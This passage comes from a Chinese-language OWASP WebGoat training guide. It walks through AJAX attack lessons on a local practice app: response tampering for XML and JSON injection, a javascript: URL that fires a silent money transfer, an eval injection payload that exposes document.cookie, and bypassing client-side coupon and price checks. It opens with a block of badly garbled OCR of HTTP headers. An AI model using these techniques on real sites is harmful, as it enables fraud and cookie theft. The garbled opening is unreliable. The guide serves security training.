Sache-Control no-cache Sache-Control no-cache Sprins-Thu, 01 Jan 1970 00 00 CET Content-Type: texthink, charset IGO-8659-1 Citransfer-Encoding: chunked Jate: Wed, 11 Jul 2007 14:43:06 GMT GRevealFildden: possibly modified Content-length: 23208 IDOCTYPE html PUBLIC*: MV3CIDTD XHTML 1.0 Transitional/EN**http://	www.w3.org/TRithtmi1/DTDIthtmi1-transitional.std*>	
Sache-Control no-cache Sache-Control no-cache Sapries Thu, Di Jan 1970 00 :00 00 CET Content-Fype: textShiftischarsebilGO-8859-1 CTransfer-Encoding: chunked Jack-Wed, 11 Jul 2007 14:43:05 GMT CReveal-Hidden: possibly modified Content-length: 23208 IDOCTYPE html PUBLIC *-WW3C/IDTD XHTML 1.0 Transitional/IEN* "http:// html:mins="http://www.w3.org/1999/nhtml">	www.w3.org/TR/shtml1/DTDIshtml1-transitional.std*+	
sche-Control no-catre spires Thu, p1 Jan 1970 00:00:00 CET content-Type: texthink, charsetili60-8659-1 CTransfer-Encoding, chunked Jate: Wed, 11 Jul 2007 14:43:06 GMT -RevealFiliden: possibly modified Johenn-Hength: 23208 DOCCTYPE html PUBLIC*-WW3CRDTDXHTML 1.0 Transitional/EN* "http:// html.xmlins="http://www.w3.org/1999/html"= head=	www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.std* >	
iache-Control: no-cache jache-Control: no-cache jantes-Tuyo: texthinki, charsebil30-8959-1 -Transfer-Encoding: chunked late: Weg, 11 Jul 2007 14.43:06 GMT -Reveal-Hidden: possibly modified jontent-length: 23208 IDOCTYPE html PUBLIC*-/W3C/IDTDXHTML 1.0 Transitiona/WEN* "http:// html.xmins="http://www.w3.org/1999/xhtml"+ head> mata httpi-equiv=*Content-Type* content=*texthitml, charsebilS0-8859-11*/	www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd*>	
Jache-Control: no-cache sache-Control: no-cache spines: Thu, 01 Jan 1970 00:00 00 CET chransfer-Encoding: chunked ale: Wed, 11 Jul 2007 14:43:06 GMT -Reveal-Hilden: possibly modified iontent-length: 23208 IDOCTYPE html PUBLIC *-/WY3C/IDTD XHTML 1.0 Transitional/EN**http:// html:minis="http://www.w3.org/1999/html"* head* meta http=equiv="Content-Type" content="texthicml; charset=ISO-8959-1*/r tite=DOM injection-stitle*	www.w3.org/TRbhtmi1/DTDbhtmi1-transitional.std">	
iache-Control: no-cache jache-Control: no-cache jache-Control: No-cache janestructure Transfer-Encoding: chunked bale: Wed, 11 Jul 2007 14.43.05 GMT -Reveal-Hidden: possibly modified iontern-length: 23208 IDOCTYPE html PUBLIC*-JWV3C/IDTD XHTML 1.0 Transitional/IEN**http:// html:minis="http://www.w3.arg/1999/khtml" head+ meta http:-equiv="Contern-Type" content="texthtml, charset=ISO-8859-1*/h time=DOM injection=tttle+	www.w3.org/TRikhtmi1/DTDikhtmi1-transitional.std">	
Jache-Control: no-cache Sache-Control: no-cache Sache-Control: No-cache Sagines-Thu, Di Jan 1970 01:00:00 CET Crransfer-Encoding: chunked Jace: Wed, 11 Jul 2007 14:43:06 GMT -Reveal-Hidden: possibly modified Sontent-length: 23208 IDOCTYPE html PUBLIC*-/WV3C/IDTD/XHTML 1:0 Transitional/IEN* http:// html:xmlins="http://www.w3.org/1999/xhtml"= head= meta http://equive="Content-Type" content="texthitml", charset=ISO-8959.1* // title=DOM injection-title= link:reb="shjdenheef" http://css/esgoon.css" hype="textficts" /> link:reb="shjdenheef" http://css/esgoon.css" hype="textficts" />	www.w3.org/TRixhtml1/D1Dixhtml1-transitional.ittd*+	
Jache-Control: no-cache jache-Control: no-cache jache-Control: No-cache jache-Kache Cransfer-Encoding: chunked Jade: Wed; 11 Jul 2007 14:43:06 GMT -Reveal/ildden: possibly modified Jace: Wed; 11 Jul 2007 14:43:06 GMT -Reveal/ildden: possible -Indden: Possible -Indden: Possible -Indden: State: Possible -Indden: State: Possible -Indden: Possible	www.w3.org/TRbhtmi1/DTDbhtmi1-transitional.dtd">	
Sache-Control no-cache Sache-Control no-cache Sprins-Thu, Di Jan 1970 01:00:00 CET Content-Type: textShifts,charsebilG0-8859-1 CTransfer-Encoding: chunked Sache-Wed, 11 Jul 2007 14:43:06 GMT CRevealFilidden: possibly modified Content-length: 23208 4DOCTYPE html PUBLIC*-/WY3C/IDTD XHTML 1.0 Transitiona///EN* "http:// thml:mins="http://www.w3.org/1999/shtml"+ head* meta http-equi="Content-Type" content="textIndml, charsebilS0-8859-1*/r time ab/DM injection-title* dink rel="stylesheet" heat*css/lexebgoat.css" hpe="textInds" /= dink rel="stylesheet" heat*css/lexebgoat.css" /= dink rel="stylesheet" heat*css/lexebgoat.css" /= dink rel="stylesheet" heat*css/lexebgoat.css" /= dink rel="stylesheet" heat*css/lexebgoat.css" /= di	www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd*>	
sche-Control no-cattle spins: Thu, 01 Jan 1970 01:00:00 CET content-Type: texthink, charsetiliG0-8859-1 Citransfer-Encoding, chunked Jate: Weg, 11 Jul 2007 14:43:06 GMT -RevealFiliden: possibly modified Johnern-length: 23208 IDOCTYPE html PUBLIC*-WW3CIDTD/0+TML 1.0 Transitional/EN**http:// thml.xmlins="http://www.w3.org/1999/xhtml"> html html:xmlins="http://www.w3.org/1999/xhtml"> heads meta http:-equip="Content-Type" content="texthicml, charset=ISO-8859-1*"/n tink rels="typesheet" http://sessesson.css" hpe="texticss" /> link rels="typesheet" http://sessesson.css" http://sessessoo	www.w3.org/TRikhtmi1/DTDikhtmi1-transitional.dtd*> sscripf* = Jscript>	
iache-Control: no-cache jache-Control: no-cache jache-Control: No-cache jagnes: Thu, pl. 13.an 1970 01:00:00 CET content-Type: texthink, charsetrisO-0895-1 Transfer-Encoding: chunked bate: Wed, 11 Jul 2007 14.43:05 GMT .Reveal-Hidden: possibly modified iontent-length: 23208 IDOCTYPE html PUBLIC*.JWV3C/IDTD XHTML 1.0 Transitional/IEN* "http:// thml.minis="http://www.w3.org/1999/html"+ head- meta http:-equiv="Content-Type" content="texthicms", charsets/ISO-8959-1* /r time-DOM Injection-tittle+ link rel="stylesheet" http://csxivebgoat.css" hpe="textbcss" /> link rel="stylesheet" http://csxivebgoat.css" http://csxivebgoat.css" /> scriptional.csxivebgoat.css" /> link rel="stylesheet" http://csxivebgoat.css" http://csxivebgoat.css" /> scriptional.csxivebgoat.css" /> link rel="stylesheet" http://csxivebgoat.css" /> link rel="stylesheet" http://csxivebgoat.css" /> scriptional.csxivebgoat.css" /> link rel="stylesheet" /= link	www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd"> www.w3.org/TRixhtmi1/DTDixhtmi1-transitional.dtd">	
Sache-Control: no-cache spries: Thu, 01 Jan 1970 01:00:00 CET ontent-Type: texthinks, charsebil60-8859-1 -Transfer-Encoding: chunked Jake: Wed, 11 Jul 2007 14:43:06 GMT -Reveal-Hildden: possibly modified iontent-length: 23208 DOC TYPE html PUBLIC *-/WV3C/IDTD XHTML, 1:0 Transitional/IEN* "http:// html:mnins="http://www.w3.org/1998/html"+ head= meta http://equiv="Content-Type" content="texthictml, charsebil60-8859.1* // time=DOM Injection-http:// time.textristheet html*:cst/webgoat.csi* type="textbcsi* /> link rels*stylesheet html*:cst/webgoat.csi* type="textbcsi* /> link rels*stylesheet html*:cst/webgoat.csi* type="textbcsi* /> link rels*stylesheet html*:cst/webgoat.csi* type="textbcsi* /> script language="JavaScript1" area: "javaScript1" area: "javaScript1;" type="textbcsis" /> script language="JavaScript1" area: "javaScript1" area: "javaScript1;" type="textbcsis" /> script language="JavaScript1" area: javaScript1" area: ja	www.w3.org/TR/shtml1/DTDIshtml1-transitional.std*+ sscripf*+v3script+ siscensesief*=stanisesief=	

HTTP 响应

拦截 HTTP 返回数据, 替换 body 内容为:

document.form.SUBMIT.disabled = false;

Edit Response			
	Intercent remaining	2 Intercent researces : 2	
	en de la constante de la consta	Here and the second	
arsod Raw			
rsion Status Message			
TP/1.1 200 OK			
Aeader Value			
gma No-cache			
res Wed 31 D			1950
Ment-Ty., testhom, ch.,			Lines
e (152, 28 Jul )			
Your Variation			
INC AND INT INT			

此时,浏览器页面代码激活按钮成功激活!



任意输入一个 license key,【单击 Activiate!】,成功完成本课程内容。



## 2.3.5 XML 注入(XML Injection)

#### 2.3.5.1 技术概念或主题

OWASP 中国 The Open: Web Application Security Project

本课程将教会您如何执行 XML 注入攻击。



#### 2.3.5.2 技术原理

AJAX 应用程序使用 XML 与服务端进行信息交互。但该 XML 内容能够被非法用户轻易拦截并篡改。

#### 2.3.5.3 总体目标

WebGoat-Miles 的 Miles 奖励显示了所有可用的奖金。一旦您成功登录自己的 ID,系统 将显示出您的账号余额及可以购买的产品。您的目标是要尽量为自己添加更多的奖励。您的 帐户 ID 是 836239。

#### 2.3.5.4 操作方法

会员 836239 只有 100 积分,只能获取 100 积分内的奖品。现在我们希望当前会员获取 到 2000,3000 积分的奖品。

输入 836239 后,网站的当前页面如图所示:

Welcome to WebGoat-Miles Reward Miles Program.

Rewards available through the program:

-WebGoat t-shirt -WebGoat Secure Kettle -WebGoat Mug -WebGoat Core Duo Laptop -WebGoat Hawaii Cruise	5 3 2 2 3	0 Pts 0 Pts 0 Pts 000 Pts 000 Pts
Redeem your points:		
Please enter your account ID:	836239	

Your account balance is now 100 points

Rewards	
---------	--

🔲 WebGoat Mug 20 Pts

🔲 WebGoat t-shirt 50 Pts

🗌 WebGoat Secure Kettle 30 Pts

Submit

打开 WebScarab 工具,点击【截获】按钮;在上图输入框 836239 的后面按回车,则爬 虫工具截获界面如下图:



OWASP 中

			Intercept requests : 🖌	Intercept responses : 🖌
Parsed	Raw			
Method U	RL			
GET ht	ttp://loca	lhost:8080/webgoat/attack?Screen=101&menu=400&from=ajax&	accountID=836239	
He	ader	Value		
Accept		*/*		
Accept-Lan	guage	zh-cn		
Referer		http://localhost:8080/webgoat/attack?Screen=101&men		
Proxy-Conn	ection	Keep-Alive		
User-Agent	t	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NE		
Host		localhost:8080		
Lloy				
nex				
Position	0 1	2 3 4 5 6 7 8 9 A B C D E F String		
► ▲. <del></del>				
Parsed	Raw			
HTTP/1.1 20	DO OK			
Server: Apa	che-Coy	ote/1.1		
Pragma: No	o-cache			
Cache-Con	trol: no-	ache		
Expires: Thu	u, 01 Ja	1970 08:00:00 CST		
Content-Tvp	) e:text/x	ml		
Date: Wed	17 Nov	2010 05:57:19 GMT		
Connection	close			
<root></root>				
≺reward≻W	ebGoat	Mug 20 Pts		
<reward>VV</reward>	ebGoat	t-shirt 50 Pts		
≺reward≻W	ebGoat	Secure Kettle 30 Pts		
- (root-				
~1000				

修改代码,在<root></root>中添加以下代码,修改后保存: <reward>WebGoat Core Duo Laptop 2000 Pts</reward>

<reward>WebGoat Hawaii Cruise 3000 Pts</reward>

在网页的输入框中再次输入 836239,则获取到积分为 2000, 3000 的奖品,如图所示:

#### Welcome to WebGoat-Miles Reward Miles Program.

Rewards available through the program:

-WebGoat t-shirt	50 Pts
-WebGoat Secure Kettle	30 Pts
-WebGoat Mug	20 Pts
-WebGoat Core Duo Laptop	2000 Pts
-WebGoat Hawaii Cruise	3000 Pts

Redeem your points:

Please enter your account ID:

836239

Your account balance is now 100 points

#### Rewards

- 🔲 WebGoat Mug 20 Pts
- 🔲 WebGoat t-shirt 50 Pts
- 🔲 WebGoat Secure Kettle 30 Pts
- 🔽 WebGoat Core Duo Laptop 2000 Pts

🔽 WebGoat Hawaii Cruise 3000 Pts

Submit

Created by Sherif Koussa 💻 a c a d a m i a n



## 2.3.6 JSON 注入(JSON Injection)

#### 2.3.6.1 技术概念或主题

本课程将教会您如何执行 JSON 注入攻击

#### 2.3.6.2 技术原理

JavaScript Object Notation (JSON)是一种简单的轻量级的数据交换格式,JSON 可以 以很多形式应用,如:数组,列表,哈希表和其他数据结构。JSON 广泛应用于 AJAX 和 web2.0 应用。相比 XML,JSON 得到程序员的更多的青睐,因为它使用更简单,速度更快。 但是与 XML 一样容易受到注入攻击,恶意攻击者可以通过在请求响应中注入任意值。

#### 2.3.6.3 总体目标

您即将从 Boston (机场代码 BOS) 飞往 Seattle (机场代码 SEA)。

一旦您输入机场代码的三个字母后,浏览器将向服务端发送 AJAX 请求查询航班和机票价格。

您将发现有两个航班可以选择:直达航班,价格贵;经停2次的转机航班,价格便宜。 您的目标是:购买直达航班的机票,但要使用更便宜的价格。

#### 2.3.6.4 操作方法

当前网站页面如图:

From:	BOS
To:	SEA

	No of Stops	Stops	Prices
0	0	N/A	\$600
0	2	Newark,Chicago	\$300
Su	bmit		



利用 WebScarab 截获到的信息如图:

OWASP 中国 The Open Web Application Security I

1 00000	0	1 2	: 3	4 5	6	7	8 !	9	AE	) C	D	E	F	String	
														 	_
Dereed	Dow													 	 
Paiseu	raw													 	
HTTP/1.1 2	00 OK														
Server: Apa	che-Co	oyote	/1.1												
Pragma: N	o-cache	е													
≥ache-Cor	trol: no	-cac	he												
Expires: Th	u, 01 J:	an 1	970	08:00	00 0	ST									
Content-Typ	be: text/	/html	1												
Date: Wed,	17 Nov	/ 201	0.07	7:58:1	7 GN	1T									
connectior	: close														
From": "Bo	ston",														
To": "Seatt	le",														
flights": [															
"stops": "0'	', "trans	sit" : '	'N/A	', "pric	e": "	\$60	0"},								
"stops": "2'	', "trans	sit" : '	'Nev	vark,C	hica	go",	"pri	ce"	': "\$3	00"	}				

提交更改后,网页上显示如图:

Solution Videos

**Restart this Lesson** 

\* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA. \* Once you enter the three digit code of the airport, an AJAX request will be executed asking for the ticket price. \* You will notice that there are two flights available, an expensive one with no stops and

another cheaper one with 2 stops. \* Your goal is to try to get the one with no stops but for a cheaper price.

From:	BOS
To:	SEA

	No of Stops	Stops	Prices
0	0	N/A	\$100
0	2	Newark,Chicago	\$300
Sub	omit		

Created by Sherif Koussa maa cadamian

OWASP Foundation | Project WebGoat | Report Bug

此时可以低价购买直达航班的机票,完成本节课程任务。



## 2.3.7 静默交易攻击(Silent Transactions Attacks)

#### 2.3.7.1 技术概念或主题

本课程将教会您如何执行静默交易攻击。

#### 2.3.7.2 技术原理

对客户端来说,任何一个静默交易攻击,使用单一提交的系统都是有危险的。举例来说, 如果一个正常的 web 应用允许一个简单的 URL 提交,一个预设会话攻击将允许攻击者在没 有用户授权的情况下完成交易。在 Ajax 里情况会变得更糟糕:交易是不知不觉的,不会在 页面上给用户反馈,所以注入的攻击脚本可以在用户未授权的情况下从客户端把钱偷走。

#### 2.3.7.3 总体目标

这是一个简单的银行转账网页,在页面上可以进行转账操作; 当前页面显示了您的账号余额、当前账号和目标转账帐号; 该应用程序在通过一些基本验证后使用 AJAX 技术提交转账操作; 您的目标是绕过用户验证,执行静默转账操作。

#### 2.3.7.4 操作方法

该 Web 应用使用 JavaScript 在客户端发起转账交易的操作。通过查看 HTML 源代码发现 程序使用了两个关键的 JavaScript 函数:

```
<script>
```

```
function processData(){
  var accountNo = document.getElementById('newAccount').value;
  var amount = document.getElementById('amount').value;
  if ( accountNo == ''){
    alert('Please enter a valid account number to transfer to.')
    return;
}
else if ( amount == ''){
    alert('Please enter a valid amount to transfer.')
    return;
```



var balanceValue = document.getElementById('balanceID').innerHTML; balanceValue = balanceValue.replace( new RegExp('\$') , ''); if ( parseFloat(amount) > parseFloat(balanceValue) ) { alert('You can not transfer more funds than what is available in your balance.') return; } document.getElementById('confirm').value = 'Transferring' submitData(accountNo, amount); document.getElementById('confirm').value = 'Confirm' balanceValue = parseFloat(balanceValue) - parseFloat(amount); balanceValue = balanceValue.toFixed(2); document.getElementById('balanceID').innerHTML = balanceValue + '\$'; }

```
function submitData(accountNo, balance) {
var url = 'attack?Screen=68&menu=400&from=ajax&newAccount='+ accountNo+
'&amount=' + balance +'&confirm=' + document.getElementById('confirm').value;
if (typeof XMLHttpRequest != 'undefined') {
req = new XMLHttpRequest();
} else if (window.ActiveXObject) {
req = new ActiveXObject('Microsoft.XMLHTTP');
  }
  req.open('GET', url, true);
  req.onreadystatechange = callback;
 req.send(null);
}
function callback() {
   if (req.readyState == 4) {
      if (req.status == 200) {
               var result = req.responseText ;
            var resultsDiv = document.getElementById('resultsDiv');
               resultsDiv.innerHTML = '';
              resultsDiv.innerHTML = result;
      }}}
</script>
```

当用户完成帐号信息和转账数目信息录入后,函数 processData()会被调用。函数 processData()在发起转账交易前,会检查用户帐号是否有足够的余额。如果余额检查通过,则函数 SubmitData(accountNo, balance)会被调用。该函数实际上是向后台(Web应用的后台) 提交转账操作所需的重要信息:目标帐号和转账金额。

如果您可以通过浏览器直接执行 submitData(accountNo, balance) 函数,那么就可以绕 55 / 177



过客户端验证并执行静默交易。该操作不需要任何额外的确认和用户数字签名。

大多数浏览器的最新版都支持通过在地址栏输入类似"javascript:function();"的语句执行 JavaScript。尝试执行 javascript:submitData(1234556,11000)。

网站当前页面如图

30101011 110005

RESCALE UNS LESSON

\* This is a sample internet banking application - money transfer page.

\* It shows below your balance, the account you are transferring to and amount you will transfer.

\* The application uses AJAX to submit the transaction after doing some basic client side validations.

\* Your goal is to try to bypass the user's authorization and silently execute the transaction.

#### Welcome to WebGoat Banking System

Account Summary:

Account Balance:	11987.09\$	
Transfer to Account:		Comference
Transfer Amount:	0	

Created by Sherif Koussa maacadamian

OWASP Foundation | Project WebGoat | Report Bug

在浏览器的地址栏中输入 javascript:submitData(1234556,11000)

<b>đ</b> Silent T	ransactions	Attacks -	Microsoft	Internet Ex	plorer					
文件( <u>F</u> )	编辑(E)	查看(⊻)	收藏( <u>A</u> )	工具 ( <u>T</u> )	帮助 ( <u>H</u> )					
Ġ 后退 👻	🕤 👻 💽	2 🏠	🔎 搜索	☆ 收藏夹	🛃 媒体	🛞  😒 🗸	5			
地址(D) 🕘 javascript:submitData(1234556,11000)										

转账成功,完成本节课程。

Welcome to WebGoat Banking System

Account Summary:

Account Balance:	11987.09\$	
Transfer to Account:		0
Transfer Amount:	0	Confirm

\* Congratulations. You have successfully completed this lesson. You have just silently authorized 11000\$ without the user interaction. Now you can send out a spam email containing this link and whoever clicks on it and happens to be logged in the same time will loose their money !!

Created by Sherif Koussa 💻 a c a d a m i a n



## 2.3.8 危险指令使用(Dangerous Use of Eval)

#### 2.3.8.1 技术概念或主题

在服务端验证所有用户输入的信息,这是一个不错的做法。如果未验证的用户输入直接 通过 HTTP 响应返回给客户端的话,往往会触发 XSS 攻击。

在这一课中,未验证的用户提供的数据结合了 JavaScript 的 eval()调用一起使用。在反射型 XSS 攻击中,攻击者可以构造带有攻击脚本的 URL,将其存储于其他站点,通过电子邮件,或者其他方式诱骗用户点击,达到 XSS 的目的。

#### 2.3.8.2 技术原理

HTML 网页有一系列的 HTML 编辑语言和字符组合完成。在源代码中任意位置添加一定的代码都有可能被浏览器解析,特别是 HTML 中的标记字符和属性等信息,如:

<input name="submit" type="submit" value"提交"/>

本节课的内容与标准的反射型 XSS 攻击课程类似。

Hint: The lesson is similar to the standard reflected cross-site scripting lesson.

#### 2.3.8.3 总体目标

本练习课程中,您的任务是通过构造特殊的输入,在应用程序运行过程中执行恶意脚本。 要通过本课程,必须通过 alert()函数显示出 document.cookie。

#### 2.3.8.4 操作方法

网站当前页面如图:

Update Cart



Shopping Cart									
Shopping Cart Items To Buy Now	Price	Quantity	Total						
Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry	69.99	1	\$69.99						
Dynex - Traditional Notebook Case	27.99	1	\$27.99						
Hewlett-Packard - Pavilion Notebook with Intel® Centrino™	1599.99	1	\$1599.99						
3 - Year Performance Service Plan \$1000 and Over	299.99	1	\$299.99						

The total charged to your credit card: \$1997.96

Enter your credit card number:

Enter your three digit access code:

4128 3214 0002 1999 123 Purchase

由于 3 位数的数字授权码会被带入 JavaScript 的 eval()函数,因此可针对该授权码进行特别构造。

在 enter your three digit access code 中输入以下代码即可完成:

123');alert(document.cookie);('

服务端收到并返回的 JavaScript 结果是:

eval('123'); alert(document.cookie); ('');



代码成功执行,本节课程结束。

## 2.3.9 不安全的客户端存储(Insecure Client Storage)

#### 2.3.9.1 技术概念或主题

在服务端验证所有的用户输入信息总是不错的做法。客户端进行的任何验证信息都存在 被逆向分析的脆弱性。记住,客户端的任何数据都不能被视为机密!

#### 2.3.9.2 技术原理

客户端 HTML 和 JavaScrip 语句可以对网页内容、形式做修改,如隐藏、控制读写、限制长度等。同样,通过修改网页代码也能解除此类限制。

#### 2.3.9.3 总体目标

#### 2.3.9.3.1 Stage 1:发现购物优惠码

本练习中,您的任务是发现意外的购物优惠码。



#### 2.3.9.3.2 Stage 2:提交免费订单

绕过客户端验证,向服务端提交零元的订单。

#### 2.3.9.4 操作方法

本操作过程需要用到可以调试 JavaScript 的浏览器插件。如果您使用 IE 浏览器,可以使用 IEWatch。以下内容基于 Firefox 浏览器的 Friebug 插件。

#### 2.3.9.4.1 Stage 1:发现购物优惠码

在页面的优惠码(coupon code)输入框中输入一个字符,比如1。

打开 Firebug,点击【Inspect】,选中页面上的 coupon code 输入框,在 Firebug 中点击 Script,选择 clientSideValidation.js,在 if(coupon == decrypted)处加断点。

😻 Insecure Client Storage - Firefox - 火狐中国	lik .									
文件 (E) 编辑 (E) 查看 (V) 历史 (S)	书签(值) 工具(工) 帮助(田)		1. N. 1. N.	- X.	Million /		a			0
C × 🟠 🛛 × 🕻	http://localhost:8080/webgc	at/attack?S	Screen=380&menu	1=400		÷ ☆ •	G . Googl	• <u>}</u>	۰ 智 🏹	-
🛐 🕥 個 访问最多 🗋 管理工具 🗋 🗖			lu.			1 <b>9</b> 7 - 1				
Insecure Client Storage 🛛		3	Minta						///// ·····	+.
Access Control Flaws AJAX Security STA	GE 2: Now, try to get your entire order	for free.								-
LAB: DDM-Based cross-site scripting * Y	our order isn't free yet.									
LAB: Client Side Filtering					_					
Same Origin Policy Protection	Shop	pping Cart		· · · · ·	-1					
DOM Injection	Now	Price	Quantity	Total	_					
XML Injection	Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry	\$69.99	0	\$0.00						
JSDN Injection	Dynex - Traditional Notebook Case	\$27.99	0	\$0.00						
Silent Transactions Attacks	Hewlett-Packard - Pavilion Notebook with Intel® Centrino™	\$1599.99	0	\$0.00						
Dangerous Use of Eval	3 - Year Performance Service Plan \$1000 and Over	\$299.99	0	\$0.00						
Insecure Client Storage					_					
Authentication Flaws Buffer Overflows	I otal before coupon is applied:		\$0.00							
Code Quality	lotal to be charged to your credit card	:	\$0.00							
Cross-Site Scripting (XSS)	Enter your credit card number:	и	128 3214 0002	1999						
Improper Error Handling	Enter your creak card hamber.	12 17	120 3214 0002	1000						
Injection Haws Insecure Communication	Enter your coupon code:	1								
Insecure Configuration Insecure Storage	P	urchase								
Malicious Execution Parameter Tampering					_					
Session Management Flaws Web Services			ASPECT	SECURI	TY					
Admin Functions Challenge			)	Application Security Spec	cialists					
	VASP Foundation   Project WebGoat   Rep	oort Bug								-
🦑 Inspect Enabled -   clientSideV	Malidation.js ∣ <b>is∀alidCoupon</b> < e	onkeyup					3.0.0	2 🔍		
Console HTML CSS Script DOM H	et Reference Brupal					Options -	Watch S	tack Breakpoints	Opti	ons *
<pre>1 var coupons = ["nwojubmq", 2 "emph".</pre>						<u> </u>	New watch (	expression		
3 "sfvmjt",							🗄 this	Window attack?Ser	≀en=360å≈en:	u=400
4 "faopsc", 5 "fopttfsq",						-	coupon i	-1- 0		
6 "pguttfsq"];							, v	2		
8							·			
10 coupon = coupon. toUpperCase()	1									
11 for(var i=0; i <coupons.length 12 decrypted = decrypt(o</coupons.length 	; i++) { oumons[i]):									
13 if(coupon == decrypte	a) [									
15 return true;	"PLATINUM"									
16 } 17 }										
18 return false;										
20						-1				
*									≱字	3 //.

鼠标放到 decrypted 上,会显示当前的值为 PLATINUM。在右下角的 watch 中,修改 coupon 的值为 PLATINUM,或在页面 coupon code 输入框中输入 PLATINUM。按 F10 调试运行,则通过。



			Enter	your cre your coi	edit card	numbe de:	r:	4	128 3214 0002 1999	
							Purcha	350	ASPECT	URITY
•			ow	ASP Fou	ndation	Projec	t WebGoat		Application	Security Specialists
-4	ie In	spect cl	ientSide	Validatio	on.js •	isValidO	oupe 👂 🤜	rr≫ ∽ I watat	Rearbaniate	
C	onsole 9	function	isVal	idCoup	on (cour	net	Options •	watch	breakpoints	Options
	10	cou	pon =	coupon	toUppe	rCase (	); =		[ "position"	', "left",
	11	for	(var i	=0; 1<	coupons ed = de	.lengt	h; 1++)		topin 3 mo	re ]
5	13		1	f(coup	on == 0	iecrypt	ed) (	dec	rypted "PLATINUM"	
	14				ajaxFu	inction	(coupon), v	🕞 ifra	me iframe	-
									IIIC ALLERING	

## 2.3.9.4.2 Stage 2:提交免费订单

由于商品列表中商品价格字段为只读,因此无法修改。现在您需要强制修改 credit card 以及 shopping card 中价格的属性。

Shop	ping Car	t			
Shopping Cart Items To Buy Now	Price		Quan	tity	Total
Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry	\$69.99		)		\$0.00
Dynex - Traditional Notebook Case	\$27.99		)		\$0.00
Hewlett-Packard - Pavilion Notebook with Intel® Centrino™	\$1599.99		)		\$0.00
3 - Year Performance Service Plan \$1000 and Over	\$299.99		)		\$0.00
Total before coupon is applied:			\$0.0	00	
Total to be charged to your credit card:	1		\$10(	00.00	
Enter your credit card number:		4128	3214	0002	1999
Enter your coupon code:		PLAT	INUM		
Pu	irchase				

利用 Firebug,在 HTML 中找到 readonly="",删除该属性。则可在页面上修改商品价格的值。



🦑 Inspect Edit I th < tr < tbody < table < form < div#lessonContent < div#lessonArea < div#twoCol < div#wrap < body.pag
Console HTML CSS Script DON Het Reference Drupal
□ (thody>
Total before coupon is applied:
<pre></pre>
<input name="SUBTOT" readonly="" style="border: 0px none ;" type="text" value="\$0.00"/>
l⊟
Total to be charged to your credit card:
<pre><input style="border: 0px none ;" type="text" value="\$0.00"/></pre>
()++>

Shop	ping Cart		
Shopping Cart Items To Buy Now	Price	Quantity	Total
Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry	\$10.00	0	\$0.00
Dynex - Traditional Notebook Case	\$27.99	0	\$0.00
Hewlett-Packard - Pavilion Notebook with Intel® Centrino™	\$1599.99	0	\$0.00
3 - Year Performance Service Plan \$1000 and Over	\$299.99	0	\$0.00

Total before coupon is applied:

Total to be charged to your credit card:

\$0.00 \$0.00

Enter your credit card number:

Enter your coupon code:

4128	3214	0002	1999

修改商品价格为\$0,然后提交订单免费购物!

## 2.4 认证缺陷(Authentication Flaws)

## 2.4.1 密码强度(Password Strength)

#### 2.4.1.1 技术概念或主题(Concept / Topic To Teach)

密码是账户安全的保障。多数用户都在各个网站上使用同样的弱密码。如果您想您的应 用程序不被攻击者暴力破解,应该设置一个较好的密码。好的密码应包含小写字母、大写字 母和数字。密码越长,效果越好。



### 2.4.1.2 技术原理(How It works)

密码越复杂, 被成功猜解的代价也越高。代价通常以时间衡量。

### 2.4.1.3 总体目标(General Goals)

在这个练习中,您的目的是在 <u>https://www.cnlab.ch/codecheck</u> 网站测试几组密码。

### 2.4.1.4 操作方法(Solutions)

打开浏览器并访问 <u>https://www.cnlab.ch/codecheck</u>. 复制下列第一个密码并单击【Run the check】按钮。

secret code checker	
This service allows you to check the quality of secret codes The server analyzes your entry and tells you about the sec strong).	online. unity rating of your code (rated as weak, muchin) or
You can enter your secret code here 123456	
You use this secret code on the following system:	Windows 2000/XP
	C Windows 95/98/NT
	C Unix
Now, you can Run the check	

在弹出的窗口中选择"Yes, I want this word to be tested"。

The transmission of data to the server is encrypted. Your inputs are not stored, only statistical information (time of check, quality, system) is collected.
It is highly recommended not to use productive secret codes. Use a code that is constructed similarly to your real secret code.
Do you want to continue?
<ul> <li>Yes, I want this word to be tested.</li> <li>No, I would like to correct my input.</li> </ul>

您将获得测试返回的结果。



rour secret code is	
	weak
Your secret code is <b>weak</b> . <i>Please</i>	e change your secret code immediately.
The analysis shows that your c	ode can be found as follows:
The analysis shows that your o Number of trials to find: 434'68	ode can be found as follows: 38
The analysis shows that your of Number of trials to find: 434'68 Approximate time to find: 0 seco	rode can be found as follows: 38 ind(s) (when doing 1'000'000 tests/second)

将练习中提供的5组密码分别放在网站中测试,将所需要的时间写出来即可完成。

## 2.4.2 忘记密码(Forgot Password)

#### 2.4.2.1 技术概念或主题(Concept / Topic To Teach)

Web 应用程序经常为用户提供密码找回功能。但不幸的是,很多 Web 应用程序的实施 机制并不正确。验证用户身份所需要的信息往往过于简单。

#### 2.4.2.2 技术原理(How It works)

没有任何锁定策略,暴力破解非常有效。

#### 2.4.2.3 总体目标(General Goals)

如果您能正确回答密码提示问题,那么您就可以找回密码。"忘记密码"页面未设定任 何锁定策略。您的用户名是"webgoat",您喜欢的颜色是"red"。您的目标是找回另一个 用户的密码。

### 2.4.2.4 操作方法(Solutions)

网站应用通常提供用户找回密码功能,当用户忘记自己的登录密码时,可以根据之前自 64/177



己设的密码保护问题才找回密码,例如:用户名为 webgoat 的用户,对于密码保护问题"您最喜欢的颜色是什么"的答案是"红色",通过正确回答问题可以重新获得密码,如下图所示:

Webgoat Password Recovery	
